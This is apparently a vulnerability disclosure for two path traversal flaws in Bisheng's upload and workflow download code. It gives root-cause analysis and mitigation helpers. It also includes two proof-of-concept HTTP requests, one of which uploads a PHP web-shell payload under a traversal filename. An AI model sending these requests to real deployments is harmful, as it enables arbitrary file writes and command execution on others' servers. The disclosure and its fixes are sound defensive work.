
Two Critical Path Traversal Vulnerabilities in Bisheng #1994

@Ro1ME

Description

Severity: Critical
CVSS Score: 9.1 (Vulnerabilities #1, #2)
Affected Versions: Latest version (as of 2026-04-20)
Attack Vector: Network (HTTP API)
Vulnerability Count: 2

  • 2 Path Traversal vulnerabilities (CBD-B5)

Vulnerability Details

Vulnerability #1: Path Traversal in save_download_file (CBD-B5)

Location: src/backend/bisheng/core/cache/utils.py:290-349
Entry Point: src/backend/bisheng/api/v1/workstation.py:177 (knowledgeUpload endpoint)
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
CVSS 3.1: 9.1 (Critical)

Vulnerable Code

@create_cache_folder
def save_download_file(file_input: Union[bytes, BinaryIO], folder_name: str, filename: str) -> str:
    """
    Synchronous I/O intensive tasks:
    Write data stream to a temporary file
    Simultaneously calculate SHA256
    Rename a file based on the hash
    """
    
    # Convert to stream objects
    if isinstance(file_input, bytes):
        src_stream = BytesIO(file_input)
    else:
        src_stream = file_input
        if hasattr(src_stream, 'seek'):
            src_stream.seek(0)
    
    # Prepare a temporary file
    cache_path = Path(CACHE_DIR)
    folder_path = cache_path / folder_name
    
    # Create the folder if it doesn't exist
    if not folder_path.exists():
        folder_path.mkdir(exist_ok=True)
    
    temp_filename = f"tmp_{uuid4().hex}"
    temp_file_path = folder_path / temp_filename
    
    sha256_hash = hashlib.sha256()
    
    try:
        # Write to temporary file and calculate SHA256 simultaneously
        with open(temp_file_path, 'wb') as dst_file:
            chunk_size = 65536  # 64KB
            while True:
                chunk = src_stream.read(chunk_size)
                if not chunk:
                    break
                sha256_hash.update(chunk)
                dst_file.write(chunk)
        
        # calculate final hash
        file_hash = sha256_hash.hexdigest()
        
        # Logic for handling filename length limits
        safe_filename = filename
        if len(filename) > 60:
            safe_filename = filename[-60:]  # VULNERABILITY: Takes last 60 chars, preserves path traversal
        
        final_file_name = f'{file_hash}_{safe_filename}'  # VULNERABILITY: No path validation
        final_file_path = folder_path / final_file_name  # Path traversal possible here
        
        # Rename (Move) Temporary File to Final Path
        if final_file_path.exists():
            os.remove(temp_file_path)
            return str(final_file_path)
        
        shutil.move(str(temp_file_path), str(final_file_path))  # VULNERABILITY: Moves to traversed path
        return str(final_file_path)

Root Cause: The filename parameter is the client-supplied multipart filename (file.filename) and is used without sanitization; truncating it to its last 60 characters does not remove ../ sequences. When final_file_path = folder_path / final_file_name is constructed, any traversal sequences such as ../../ inside final_file_name are kept as path segments, so the resulting path can escape the intended cache directory.
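The sketch below replays the path construction from save_download_file with placeholder values (the cache directory and the digest are hypothetical) and touches no files. Because the digest and an underscore are prepended, the first .. supplied by the client becomes part of the literal component <hash>_..; only the later .. segments act as parent references. posixpath.normpath collapses them lexically and climbs out of the bisheng folder, and how far the path climbs depends on how many ../ segments are sent relative to the depth of CACHE_DIR. The Linux kernel, however, resolves components one at a time rather than normalizing the string first, so the final shutil.move leaves the folder only if a directory literally named <hash>_.. already exists there; otherwise the move fails.

```python
import posixpath
from pathlib import PurePosixPath

# Placeholder values: neither is Bisheng's real CACHE_DIR nor a real digest
cache_dir = "/app/cache"
folder_name = "bisheng"
file_hash = "ab" * 32  # stands in for a 64-character SHA-256 hex digest
filename = "../../../tmp/bisheng_pwned.php"  # filename used in PoC #1

# Same steps as save_download_file, minus the actual file I/O
safe_filename = filename[-60:] if len(filename) > 60 else filename
final_file_name = f"{file_hash}_{safe_filename}"
final_file_path = PurePosixPath(cache_dir) / folder_name / final_file_name

# The '/' operator splits on separators but does not collapse '..':
# the first element below is '<hash>_..', followed by '..', '..', 'tmp', 'bisheng_pwned.php'
print(final_file_path.parts[4:])
# Lexical normalisation treats the two bare '..' segments as parent references
print(posixpath.normpath(str(final_file_path)))  # /app/cache/tmp/bisheng_pwned.php
```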

HTTP API Entry Point

# src/backend/bisheng/api/v1/workstation.py:172-182
@router.post('/knowledgeUpload')
def knowledgeUpload(request: Request,
                    background_tasks: BackgroundTasks,
                    file: UploadFile = File(...),
                    login_user: UserPayload = Depends(UserPayload.get_login_user)):
    try:
        file_path = save_download_file(file.file, 'bisheng', file.filename)  # VULNERABLE
        res = WorkStationService.uploadPersonalKnowledge(request,
                                                         login_user,
                                                         file_path=file_path,
                                                         background_tasks=background_tasks)
        return resp_200(data=res[0])
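
Because knowledgeUpload passes file.filename straight through, a fix can reduce the name to its last component before it reaches save_download_file and then confirm the joined path still resolves under the target folder. The sketch below is one possible mitigation, not Bisheng's code: sanitize_upload_filename and resolve_inside are hypothetical helpers, and Path.is_relative_to assumes Python 3.9 or later.

```python
import tempfile
from pathlib import Path, PureWindowsPath


def sanitize_upload_filename(filename: str) -> str:
    """Hypothetical helper: reduce a client-supplied upload name to a bare file name."""
    # PureWindowsPath treats both '/' and '\\' as separators, so this drops any
    # directory part regardless of which separator the client used.
    name = PureWindowsPath(filename).name
    if name in ("", ".", ".."):
        raise ValueError(f"invalid upload filename: {filename!r}")
    return name


def resolve_inside(base_dir: Path, name: str) -> Path:
    """Hypothetical helper: join name onto base_dir and refuse results outside it."""
    base = base_dir.resolve()
    candidate = (base / name).resolve()  # non-strict resolve: the file need not exist yet
    if not candidate.is_relative_to(base):  # Path.is_relative_to requires Python 3.9+
        raise ValueError(f"path escapes {base}: {candidate}")
    return candidate


if __name__ == "__main__":
    print(sanitize_upload_filename("../../../tmp/bisheng_pwned.php"))  # bisheng_pwned.php
    with tempfile.TemporaryDirectory() as tmp:
        print(resolve_inside(Path(tmp), "abc_report.pdf").name)  # abc_report.pdf
```

Inside save_download_file this could look like safe_filename = sanitize_upload_filename(filename)[-60:] followed by final_file_path = resolve_inside(folder_path, f'{file_hash}_{safe_filename}'). The containment check is a second layer in case an unsanitized name ever reaches the join; splitting on backslashes also on POSIX is a deliberately conservative choice.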

Vulnerability #2: Path Traversal in _download_file (CBD-B5)

Location: src/backend/bisheng/linsight/domain/task_exec.py:225-246
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
CVSS 3.1: 9.1 (Critical)

Vulnerable Code

async def _download_file(self, file_info: dict, target_dir: str) -> str:
    """Download individual files"""
    object_name = file_info["markdown_file_path"]
    file_name = file_info.get("markdown_filename", os.path.basename(object_name))
    file_path = os.path.join(target_dir, file_name)  # VULNERABILITY: No path validation
    minio_client = await get_minio_storage()
    try:
        file_url = await minio_client.get_share_link(object_name, clear_host=False)
        http_client = await get_http_client()
        
        with open(file_path, "wb") as f:  # VULNERABILITY: Writes to traversed path
            async for chunk in http_client.stream(method="GET", url=str(file_url)):
                f.write(chunk)
        
        if not os.path.exists(file_path) or os.path.getsize(file_path) == 0:
            raise ValueError(f"File download failed or empty: {object_name}")
        
        return file_path
    
    except Exception as e:
        logger.error(f"Download failed {object_name}: {e}")
        raise

Root Cause: The file_name taken from the file_info dictionary (which can be user-controlled via workflow configuration) is joined directly with target_dir using os.path.join(). If file_name contains path traversal sequences, the file is written outside the intended directory; if it is an absolute path, os.path.join() discards target_dir entirely and the absolute path is used as-is.
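The sketch below replays the join in _download_file with a hypothetical session directory, using posixpath so the printed paths are the same on any platform. Unlike vulnerability #1, nothing is prepended to the name, so once target_dir exists every intermediate component resolves and, assuming no symlinks along the way, the relative payload lands where normpath predicts. safe_target_path is a hypothetical helper showing one possible mitigation rather than Bisheng's code: it keeps only the last path component and then checks the resolved result with os.path.commonpath.

```python
import os
import posixpath
import tempfile

# Hypothetical directory standing in for _download_file's target_dir
session_dir = "/data/linsight/session_123"

# Relative traversal, as in PoC #2: the join keeps the '..' segments...
relative = posixpath.join(session_dir, "../../../tmp/linsight_pwned.txt")
print(relative)                      # /data/linsight/session_123/../../../tmp/linsight_pwned.txt
print(posixpath.normpath(relative))  # /tmp/linsight_pwned.txt
# ...and an absolute component makes join() discard the base directory altogether
print(posixpath.join(session_dir, "/etc/cron.d/pwned"))  # /etc/cron.d/pwned


def safe_target_path(target_dir: str, file_name: str) -> str:
    """Hypothetical helper: confine a file name from file_info to target_dir."""
    base = os.path.realpath(target_dir)
    # Keep only the last component; map '\\' to '/' so Windows-style names are split too
    name = os.path.basename(file_name.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError(f"invalid file name: {file_name!r}")
    candidate = os.path.realpath(os.path.join(base, name))
    # Second layer: after following symlinks, the path must still live under base
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes {base}: {candidate}")
    return candidate


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(safe_target_path(tmp, "../../../tmp/linsight_pwned.txt"))
        print(safe_target_path(tmp, "/etc/cron.d/pwned"))
```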

Proof of Concept

PoC #1: Exploiting save_download_file via knowledgeUpload

import requests

# Bisheng API endpoint
url = "http://localhost:3001/api/v1/workstation/knowledgeUpload"

# Payload content; the path traversal is carried in the filename below
malicious_content = b"<?php system($_GET['cmd']); ?>"

files = {
    'file': ('../../../tmp/bisheng_pwned.php', malicious_content, 'application/octet-stream')
}

# Authenticated request (replace with valid token)
headers = {
    'Authorization': 'Bearer YOUR_AUTH_TOKEN'
}

response = requests.post(url, files=files, headers=headers)
print(response.json())

Expected Result: File written to /tmp/bisheng_pwned.php instead of the cache directory.

Verification:

ls -la /tmp/bisheng_pwned.php
# File should exist outside the cache directory

PoC #2: Exploiting _download_file via Linsight Workflow

import requests

# Linsight workflow execution endpoint
url = "http://localhost:3001/api/v1/linsight/workflow/execute"

# Malicious workflow configuration
payload = {
    "session_id": "test_session",
    "files": [
        {
            "markdown_file_path": "legitimate/path/file.md",
            "markdown_filename": "../../../tmp/linsight_pwned.txt"  # Path traversal
        }
    ]
}

headers = {
    'Authorization': 'Bearer YOUR_AUTH_TOKEN',
    'Content-Type': 'application/json'
}

response = requests.post(url, json=payload, headers=headers)
print(response.json())

Expected Result: File downloaded to /tmp/linsight_pwned.txt instead of the workflow directory.


Impact

Security Impact

  1. Arbitrary File Write (Vulnerabilities #1, #2):

    • Attackers can write files to any location accessible by the Bisheng process
    • Can overwrite existing files including application code and configuration
  2. Configuration Tampering:

    • Overwrite configuration files, credentials, or environment files
    • Modify database connection strings to redirect data
  3. Privilege Escalation:

    • If Bisheng runs with elevated privileges, attackers can write to system directories
    • Can create cron jobs, systemd services, or other persistence mechanisms
  4. Data Integrity:

    • Overwrite legitimate application files or user data
    • Corrupt application state or databases
